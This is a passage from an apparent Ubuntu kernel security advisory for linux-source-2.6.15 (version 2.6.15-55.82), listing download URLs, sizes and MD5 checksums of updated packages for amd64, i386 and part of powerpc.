74be7582e8f82aeb48af59731ce128be\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:     2312 d464c76f98a4142add7a69aca1305739\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    36294 a65060e99feff7e2ecef38be6d92fbc3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   102366 04d59c868ce03dc83b69116b022735b8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    38892 e80a653bb000e86f38da594d4bc1742d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    49160 a512718368004f81e83063ea8972c871\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   176612 81ab4c185b3af1dea1a082283c1ec9b4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    36776 fcb0833daefa645545a2451824094b21\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   142346 3e6446140bfad0b19c512c69377d8026\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    51060 a11ceed7ccb1b96c2a8b2e7f840061b9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   140710 e1789bb9d7cdd542a862e8ef209de802\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   287606 f3cc835959f215c209dc5a825596849c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    97828 05627ddbba40a6517ae7f8ca75f195c1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:  1652102 c9eea2df3fdde2a5e7d2f4dff99e6772\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-generic_2.6.15-55.82_amd64.deb\n      Size/MD5:   872314 6e8f80e117e13665c95fb75593853d49\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-k8_2.6.15-55.82_amd64.deb\n      Size/MD5:   872448 1a70a906bccd7642241535f79feddb57\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-server_2.6.15-55.82_amd64.deb\n      Size/MD5:   874570 0da9cd27666b58b5328e18dbc01c9b2e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-xeon_2.6.15-55.82_amd64.deb\n      Size/MD5:   872194 375aad441654cdcd2338c5809e6319ad\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_amd64.deb\n      Size/MD5:  6926870 c5868857ae3e12da5ffd91ec60d75501\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-generic_2.6.15-55.82_amd64.deb\n      Size/MD5: 20817720 06e066129d82d4fa8e41a2a058dcb9f0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-k8_2.6.15-55.82_amd64.deb\n      Size/MD5: 20798158 1e5bf064dc2aab9880b30448d06eba9d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-server_2.6.15-55.82_amd64.deb\n      Size/MD5: 21635636 0bb9fd3f753b4dcedf70fa8f36c48467\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-xeon_2.6.15-55.82_amd64.deb\n      Size/MD5: 19905244 a04e5f6463fe334c28598cbf13506043\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    15630 8d1da510f959f7b9a2d0aa73ab80ae39\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   240360 20cd65fa275cfe8a83743ddb5a95f528\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   202666 71d8be83541874d6c675945838b9e223\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:  1048610 9125e9e6c294bb450e37643b3ed7397e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:  1543634 ff7af4dcfc269a529f0adef3823a7244\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   161692 5623fa9ad6b280d0a5271917e89ca8ab\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:     9832 bd5218587371f5b309ef2d1f77f98420\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    80870 20f034d6199d2902130f8bba12f48afe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    49294 e4a805200acaaea274e67995602294e6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    35158 0869bee234a54b1afe362123606efe66\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    70890 74ad81f0209c505c41d61c143b90f879\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:     6218 ab28cdccb61315cac14d9046821e264d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:     9060 6b179cd944eb7f83f03147e09025e6be\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    57924 5465064d051dec863ad3f4f1a91553f6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   123380 18eabdae11c2d77a1694f0cd467107a3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   101078 efbe32714c0fed5aec8a70095af299df\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    79272 2fbe8585b11e0fa73fad8e94298082bf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:  1595398 3e11b94ed4701d1d84b6aeb303782d97\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    72352 e413c3057779de1b3c8f0c4d8d7fb577\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    12648 41487d8dc828d7f94a5c8ed495f06a99\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    33806 ebf707126fa6326899d648786afa8779\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   138512 ff1e0d4f0e9c5efc7bbae4d92194da5d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    38938 75eb074224a6373013e621cdd5931a51\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   278876 1586e5c6fc3fedf7f63f19c35a4fd9e8\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    18976 940a7c03cfe47e9d0543f49849c8765f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    43482 466c625f614e3624fa548bc5f96efa74\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   105216 d45ce18fb4d9c2cf5da6d14ae69a86c4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:     2284 de2293fa5c6e5493307a1913b606ad20\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    34572 4e302b4f7144fd504b2475a4103a3bf5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    97044 eeafb6c943244dd33659e7e7db9a9f76\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    37128 d4d67e516f236bf54a00697b71a3219b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    44122 1657e3520cbd2fbc832cf91bd6366a38\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   167738 7431ddaa7c8f0c9b6e583129cdc839f7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    33954 8251d509fb9bacd314f62cc90bda5b96\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   137972 9b8295fffc47ab4cf16ec34f7ef8b7aa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    46892 c12096744faa1ca0735b62ea045b0c65\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   133162 5805bb2e2bfab6158d8d217b08079cc2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   273806 be7956f256f494fe4f40e7e7129bdcd7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   102330 d6a81f9c342c0ebe2010b66d4a7c59ae\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:  1597678 ab989d0c749b837c67a2a839f139fbb2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-386_2.6.15-55.82_i386.deb\n      Size/MD5:   863294 c444f51c8b2752c6a7bb7e6890917ae2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-686_2.6.15-55.82_i386.deb\n      Size/MD5:   862506 1508b314277964abb0d05e8a274d2a26\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-k7_2.6.15-55.82_i386.deb\n      Size/MD5:   863628 69ee54c68825997e29779c3a2ab66625\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server-bigiron_2.6.15-55.82_i386.deb\n      Size/MD5:   866414 fa045eb17626dde56b96d70431e9515b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server_2.6.15-55.82_i386.deb\n      Size/MD5:   865826 30916e33e56490d9a2acf31c03690e64\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_i386.deb\n      Size/MD5:  6918500 a2bb7aa892eb2d21ea3d04f519b72482\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-386_2.6.15-55.82_i386.deb\n      Size/MD5: 21724666 e1390cea2d5e21dee938aaf3f88786f5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-686_2.6.15-55.82_i386.deb\n      Size/MD5: 22516786 35a5512e74cf490346c35fd56f695fca\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-k7_2.6.15-55.82_i386.deb\n      Size/MD5: 22265258 07155a925272e66ace552f82d16b1b79\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server-bigiron_2.6.15-55.82_i386.deb\n      Size/MD5: 23626692 d229112410ce8c9c9947f2f7cd32c883\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server_2.6.15-55.82_i386.deb\n      Size/MD5: 23179552 9b108d16a1fc1716b78c4417150e311e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    15512 4a2a37534dc2bc6b0ce12df135d07105\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   238510 544c418a7426a5248e33ff549c6f4035\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   197134 9ec57cc477f5bc4e0dba11002d3988e5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:  1048370 cd87ff58b5cbea9c04eac21cf1b0784c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:  1741406 0b97758852f283e148ec2ce290e678ef\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   160884 ce6d2a16b8a3af5706b694fe6f8ac4f5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:     9162 d5f4619ccc32c2ed8296823cd3c19e3e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    76468 9f0911cef3a4b7afb14f1bd537ad337e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    53554 afc415fd0a28c363579986fc48464671\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    33048 c710f55e8853bec0935df3338f2370c2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    85618 b6ed96be15afaf31e6670a78ff1f4733\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:     6024 b0a622b932e40a7011d5e9ec9bd21eb3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:     8762 6234ceb3aa1422433ee60ad4305c03e7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    53636 e1a35b8801fb949295040028cd2cba5e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   130970 25d88aae6168f72c58ca17584b3f83e0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    98468 ddb974591a687460f50c26a2e2682593\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    77212 a9ec9f2fe551ec07e56200b26f1de4f8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:  1768830 477e2985e9f1fd2d4f333d651ce07e2f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    69612 2547b29a65a8391d3a085bbf2ce476aa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    11764 88566d97534c428d1ef6b01b5adde2ab\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    36102 10638cf7adf98d9afcc1e1475dbaf05c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   132672 fa6f13f8c0c0d017f50dc160bf2961fc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    38578 32976528861368cdb936d5db4fc0c2b5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   299158 458051a07217501718f6e2a742bec0a3\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    23726 0fbb9855c5833cb24187a701c10cdfbe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    26006 87108baca7e8450f580be0f6c77d95de\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    49328 c6fe9fa1f1e132f4906b21e555bfb079\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    51536 d2c7a02ac033097208c359312e95d246\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:     2308 5b98b064d0e5c18d8c32caa86b2e43e5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:     2482 3c964c577c93d80cee55d06e78003951\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    40306 ad5c5c36d7dc08add999f8cf47d53b72\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    43848 0cfb559dfe56e4a50c99537f98392827\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   112606 9994a8d2bb1c9a45cf43416faca7f9fe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   120734 092bb2c1dfcece144429a277f96b56e9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    40906 84f84dc75718a347eb6623204cab6209\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    45996 69f5b1a8a9e82414d868ae459109f32c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    29024 1a12ad8c384bd5195208ce7eb478c011\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    29892 4a807f384985ae3376d509474716f13a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   211398 2e302e02bf08226ad9bf45c3a04840b3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   225174 0c4edfa7ccdb502d5aefc7b02a2e81e5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    45054 a2373aac90339698b2cba11e43978565\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    40220 06b0e3234fd6b0125df72fc04c4d0562\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:     1934 0887612df6acbc867949c33251427c00\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:     2198 d38a4ec22579275ff2f48805be734356\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    80760 0a71c80867de5b11bd73c9c6d2751448\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    86134 0531dff0f43a6073ae4e71e93e1d77ce\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   111580 ab42bedd2a1e1687015d5b6b4b327484\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   125734 3c526ccc2348c1f6dd65829c96fb1381\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    53412 13f7a9a412c8c38c4a22a0f4db2a2bd9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    58486 0a62b4bc8aa5f594de9efc6b9f1dec6a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   147964 9751a30ed03bc5bde2b48be1e5dce6e3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   161908 70564b18529d383509cb4c1d4898425a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   318412 7944aa213ac28d37d390b48b3d5a9a8d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   288032 2b93681e1b268517863ee4bf27ba0899\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   115862 3cd4a494b7d9652bd77eb9dda6d2eeb9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   116548 a40033c7a63dda0aa5911caf2dd7f49a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:  1925072 2c1fefed78a6ebc795887a2f27c9db4e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:  2449126 39606af1d24872f0ff053ef5ddf790bd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc-smp_2.6.15-55.82_powerpc.deb\n      Size/MD5:   872990 d1ced46d4302cb78b2d47c5ea678d6bc\n    